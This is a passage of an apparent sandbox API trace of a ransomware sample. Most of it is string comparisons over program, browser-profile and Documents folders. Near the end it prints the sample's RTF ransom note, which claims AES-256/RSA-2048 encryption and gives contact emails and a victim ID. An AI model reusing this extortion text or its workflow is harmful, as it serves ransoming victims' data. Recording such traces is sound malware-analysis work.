lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\POL\\", cchCount2=64) returned 1 [0064.356] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\POL\\", cchCount1=64, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\POL\\", cchCount2=64) returned 2 [0064.356] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\", cchCount1=44, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SKY\\", cchCount2=64) returned 3 [0064.356] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\HRV\\", cchCount1=64, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SKY\\", cchCount2=64) returned 1 [0064.356] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\POL\\", cchCount1=64, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SKY\\", cchCount2=64) returned 1 [0064.356] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SKY\\", cchCount1=64, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SKY\\", cchCount2=64) returned 2 [0064.356] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\", cchCount1=44, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\TUR\\", cchCount2=64) returned 3 [0064.356] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\HRV\\", cchCount1=64, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\TUR\\", cchCount2=64) returned 1 [0064.356] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\POL\\", cchCount1=64, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\TUR\\", cchCount2=64) returned 1 [0064.356] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SKY\\", cchCount1=64, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\TUR\\", cchCount2=64) returned 1 [0064.357] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SLV\\", cchCount1=64, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\TUR\\", cchCount2=64) returned 1 [0064.357] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\", cchCount1=44, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\TUR\\", cchCount2=64) returned 3 [0064.357] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\JPN\\", cchCount1=64, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\TUR\\", cchCount2=64) returned 1 [0064.357] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\PTB\\", cchCount1=64, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\TUR\\", cchCount2=64) returned 1 [0064.357] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SLV\\", cchCount1=64, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\TUR\\", cchCount2=64) returned 1 [0064.357] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\TUR\\", cchCount1=64, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\TUR\\", cchCount2=64) returned 2 [0064.357] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\", cchCount1=44, lpString2="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\", cchCount2=92) returned 1 [0064.357] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", cchCount1=40, lpString2="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\", cchCount2=92) returned 3 [0064.357] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\", cchCount1=76, lpString2="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\", cchCount2=92) returned 3 [0064.357] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\", cchCount1=92, lpString2="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\", cchCount2=92) returned 2 [0064.357] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\", cchCount1=44, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CAT\\", cchCount2=80) returned 3 [0064.357] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\JPN\\", cchCount1=64, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CAT\\", cchCount2=80) returned 1 [0064.357] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\PTB\\", cchCount1=64, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CAT\\", cchCount2=80) returned 1 [0064.357] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SLV\\", cchCount1=64, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CAT\\", cchCount2=80) returned 1 [0064.357] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\TUR\\", cchCount1=64, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CAT\\", cchCount2=80) returned 1 [0064.357] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CAT\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CHT\\", cchCount2=80) returned 1 [0064.357] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\", cchCount1=122, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CHT\\", cchCount2=80) returned 3 [0064.357] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\", cchCount1=97, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CHT\\", cchCount2=80) returned 3 [0064.358] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\", cchCount1=44, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CHT\\", cchCount2=80) returned 3 [0064.358] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CHT\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\DAN\\", cchCount2=80) returned 1 [0064.358] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\", cchCount1=122, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\DAN\\", cchCount2=80) returned 3 [0064.358] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\", cchCount1=97, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\DAN\\", cchCount2=80) returned 3 [0064.358] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\", cchCount1=44, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\DAN\\", cchCount2=80) returned 3 [0064.358] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CHT\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\", cchCount2=92) returned 1 [0064.358] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\", cchCount1=122, lpString2="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\", cchCount2=92) returned 3 [0064.358] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\", cchCount1=97, lpString2="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\", cchCount2=92) returned 3 [0064.358] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\", cchCount1=44, lpString2="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\", cchCount2=92) returned 1 [0064.358] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\", cchCount1=92, lpString2="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\", cchCount2=92) returned 2 [0064.358] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CHT\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\", cchCount2=92) returned 1 [0064.358] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\", cchCount1=122, lpString2="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\", cchCount2=92) returned 3 [0064.358] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\", cchCount1=97, lpString2="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\", cchCount2=92) returned 3 [0064.358] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\", cchCount1=44, lpString2="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\", cchCount2=92) returned 1 [0064.358] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\", cchCount1=92, lpString2="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\", cchCount2=92) returned 2 [0064.358] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CHT\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\", cchCount2=97) returned 1 [0064.358] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\", cchCount1=122, lpString2="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\", cchCount2=97) returned 3 [0064.359] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\", cchCount1=97, lpString2="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\", cchCount2=97) returned 2 [0064.359] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CHT\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\", cchCount2=97) returned 1 [0064.359] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\", cchCount1=122, lpString2="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\", cchCount2=97) returned 3 [0064.359] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\", cchCount1=97, lpString2="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\", cchCount2=97) returned 2 [0064.359] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CHT\\", cchCount1=80, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\JlHpXBn7\\", cchCount2=49) returned 1 [0064.359] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\", cchCount1=122, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\JlHpXBn7\\", cchCount2=49) returned 1 [0064.359] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\", cchCount1=54, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\JlHpXBn7\\", cchCount2=49) returned 3 [0064.359] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\G155GR\\", cchCount1=47, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\JlHpXBn7\\", cchCount2=49) returned 1 [0064.359] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\JlHpXBn7\\", cchCount1=49, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\JlHpXBn7\\", cchCount2=49) returned 2 [0064.359] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CHT\\", cchCount1=80, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", cchCount2=40) returned 1 [0064.359] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\", cchCount1=122, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", cchCount2=40) returned 1 [0064.359] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\", cchCount1=54, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", cchCount2=40) returned 3 [0064.359] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\G155GR\\", cchCount1=47, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", cchCount2=40) returned 3 [0064.359] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", cchCount1=40, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", cchCount2=40) returned 2 [0064.359] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CHT\\", cchCount1=80, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", cchCount2=46) returned 1 [0064.359] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\", cchCount1=122, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", cchCount2=46) returned 3 [0064.360] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\", cchCount1=97, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", cchCount2=46) returned 1 [0064.360] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", cchCount1=46, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", cchCount2=46) returned 2 [0064.360] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CHT\\", cchCount1=80, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lS gbMc\\", cchCount2=48) returned 1 [0064.365] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 